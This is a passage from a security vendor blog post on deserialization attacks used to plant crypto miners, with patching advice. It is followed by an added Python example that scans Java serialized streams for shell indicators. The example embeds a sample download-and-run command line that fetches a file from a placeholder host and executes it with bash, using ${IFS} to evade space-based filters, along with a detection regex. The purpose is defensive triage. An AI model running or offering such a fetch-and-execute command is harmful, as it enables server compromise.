This old attack method with a new payload suggests a new trend: attackers exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster return on their "effort".

## Recommendations

Given the many new insecure deserialization vulnerabilities discovered this year, and the category's appearance in the OWASP top 10 security risks, we expect more to be published in 2018. In the meantime, organizations running affected servers are advised to apply the latest vendor patches.

Where a patch cannot be applied immediately, virtual patching is an alternative. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.

A WAF that provides virtual patching doesn't interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching timeline.

Learn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).

_Source: "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", Imperva blog, published 2018-01-24, <https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>_
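The Java serialized object in Figure 7 can be triaged the way a WAF or a log reviewer would, by carving the byte stream rather than deserializing it. The following added example (Python; not code from the original post) hand-assembles a minimal Java serialization stream with a constructed command line in a String field, then scans it for the 0xACED 0005 header, TC_CLASSDESC class names and TC_STRING values, and reports download-and-run vocabulary, including the ${IFS} space substitute noted above. The class name com.example.Job, the field name, the host and the indicator list are assumptions for the example; the carve is a triage heuristic, not a full stream parser.

```python
"""Carve class names and strings out of a Java serialization byte stream
(the 0xACED 0005 format behind Figure 7) and flag download-and-run
vocabulary, including ${IFS} used in place of spaces.

Added example, not code from the original post. The sample stream is
hand-assembled from the published stream grammar; the class name, field
name and command line are constructed placeholders."""
import re
import struct

STREAM_HEADER = b"\xac\xed\x00\x05"  # STREAM_MAGIC followed by STREAM_VERSION
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_STRING, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x74, 0x78
SC_SERIALIZABLE = 0x02

# Dotted Java class name as it appears right after TC_CLASSDESC.
CLASS_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+$")
# Shell vocabulary seen in the payloads the text describes (assumed list).
SHELL_INDICATORS = re.compile(
    r"\$\{?IFS\}?|\bwget\b|\bcurl\b|\b(?:ba)?sh\b|cmd\.exe|powershell", re.I)

# Constructed command line: ${IFS} stands in for every space (placeholder host).
SAMPLE_COMMAND = ("wget${IFS}-q${IFS}http://dropper.example.invalid/logo.jpg"
                  "${IFS}-O${IFS}/tmp/logo.jpg;bash${IFS}/tmp/logo.jpg")


def _utf(s):
    """Java stream UTF field: 2-byte big-endian length, then the bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def build_sample_stream(class_name, field_name, value):
    """Hand-assemble a minimal stream: one Serializable class with a single
    String field holding `value`. Constructed for this example only."""
    out = bytearray(STREAM_HEADER)
    out.append(TC_OBJECT)
    out.append(TC_CLASSDESC)
    out += _utf(class_name)
    out += struct.pack(">q", 0x1122334455667788)  # serialVersionUID (arbitrary)
    out.append(SC_SERIALIZABLE)                   # classDescFlags
    out += struct.pack(">H", 1)                   # one field follows
    out += b"L" + _utf(field_name) + bytes([TC_STRING]) + _utf("Ljava/lang/String;")
    out.append(TC_ENDBLOCKDATA)                   # no class annotations
    out.append(TC_NULL)                           # no superclass descriptor
    out.append(TC_STRING)
    out += _utf(value)                            # the field's value
    return bytes(out)


def scan_java_stream(data):
    """Heuristic carve for triage, not a full parser: wherever a TC_CLASSDESC
    or TC_STRING marker is followed by a plausible length-prefixed UTF
    string, record it and skip past it so its bytes are not re-scanned."""
    report = {"is_java_stream": data[:4] == STREAM_HEADER,
              "classes": [], "strings": [], "shell_indicators": []}
    if not report["is_java_stream"]:
        return report
    i = 4
    while i + 3 <= len(data):
        tc = data[i]
        if tc in (TC_CLASSDESC, TC_STRING):
            n = struct.unpack(">H", data[i + 1:i + 3])[0]
            chunk = data[i + 3:i + 3 + n]
            if 0 < n == len(chunk):
                if tc == TC_CLASSDESC and CLASS_NAME.match(chunk):
                    report["classes"].append(chunk.decode())
                    i += 3 + n
                    continue
                if tc == TC_STRING and all(0x20 <= c < 0x7F for c in chunk):
                    report["strings"].append(chunk.decode())
                    i += 3 + n
                    continue
        i += 1
    hits = {m.group(0) for s in report["strings"] for m in SHELL_INDICATORS.finditer(s)}
    report["shell_indicators"] = sorted(hits)
    return report


if __name__ == "__main__":
    stream = build_sample_stream("com.example.Job", "cmd", SAMPLE_COMMAND)
    print(stream[:16].hex(" "))  # starts with the ac ed 00 05 header
    print(scan_java_stream(stream))
    print(scan_java_stream(b'{"job": "nightly"}'))
```

The carve never calls a deserializer, so it is safe to run on hostile input; the class names it recovers are what a deny-list or allow-list rule would be written against, and the ${IFS} match shows why indicator rules must tolerate the space-substitution trick rather than look for "wget -q" literally.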